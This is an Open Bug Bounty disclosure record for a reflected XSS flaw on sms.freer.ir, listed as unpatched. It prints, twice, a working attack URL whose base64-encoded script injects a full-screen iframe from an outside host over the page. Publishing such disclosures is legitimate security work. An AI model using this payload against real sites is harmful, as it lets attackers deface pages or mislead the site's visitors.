sms.freer.ir XSS vulnerability

2015-07-08T12:00:00

Description

##### Vulnerable URL: http://sms.freer.ir/gateway/index.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!-- ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 2 VIP website status:| No Check sms.freer.ir SSL connection:| (Grade: C) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability reported| 8 July, 2015 12:00 GMT Vulnerability existence verified and confirmed| 8 July, 2015 12:03 GMT

{"type": "openbugbounty", "lastseen": "2017-10-18T19:41:59", "href": "https://www.openbugbounty.org/reports/70576/", "cvss": {"score": 0.0, "vector": "NONE"}, "reporter": "sToRm", "description": "##### Vulnerable URL:\n \n \n http://sms.freer.ir/gateway/index.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!--\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| No \nLatest check for patch:| 25.07.2017 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| Unknown / Not calculated \nGoogle Pagerank| 2 \nVIP website status:| No \nCheck sms.freer.ir SSL connection:| (Grade: C) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability reported| 8 July, 2015 12:00 GMT \nVulnerability existence verified and confirmed| 8 July, 2015 12:03 GMT\n", "bulletinFamily": "bugbounty", "references": [], "viewCount": 4, "cvelist": [], "openbugbounty": {"mirror": "", "patchStatus": "unpatched"}, "enchantments_done": [], "title": "sms.freer.ir XSS vulnerability ", "id": "OBB:70576", "modified": "2015-07-08T12:03:00", "published": "2015-07-08T12:00:00", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645331093}}